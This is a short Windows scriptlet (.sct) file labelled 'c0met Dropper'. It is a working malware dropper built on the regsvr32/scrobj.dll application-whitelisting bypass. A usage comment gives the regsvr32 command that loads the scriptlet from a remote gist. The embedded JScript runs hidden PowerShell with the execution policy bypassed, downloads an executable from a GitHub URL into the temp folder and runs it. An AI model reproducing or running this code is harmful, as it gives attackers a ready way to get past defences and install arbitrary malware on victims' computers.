<?XML version="1.0"?>
<scriptlet>

<registration
    description="c0met Dropper"
    progid="c1ropper"
    version="1.00"
    classid="{B3EE9B60-8585-460E-8FC0-82AF2E90DDBA}"
	>
	<!-- USAGE -->
	<!-- regsvr32 /s /n /u /i:https://gist.githubusercontent.com/Elm0D/b5661eb607cfd7f0f352e672a30d192d/raw/d8b428d2b6a0df8b8474f27fe224026363bb2262/Test-MsgBox-Downloader.sct scrobj.dll -->
	<!-- Credits Of Concept - Casey Smith  -->
	<script language="JScript">
		<![CDATA[
		
            var Wish = new ActiveXObject("WScript.Shell");
			var d1ce = "$down = New-Object System.Net.WebClient;$url = 'https://github.com/c0met/123.sct/raw/master/Encrypted.exe';$file = '%TMP%\\1-DEL-ME.exe';$down.DownloadFile($url,$file);$exec = New-Object -com shell.application;$exec.shellexecute($file);exit;";
			var p0wrsh3ll = 'powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command ';
			Wish.Exec(p0wrsh3ll + d1ce);
    
		]]>
</script>
</registration>

</scriptlet>
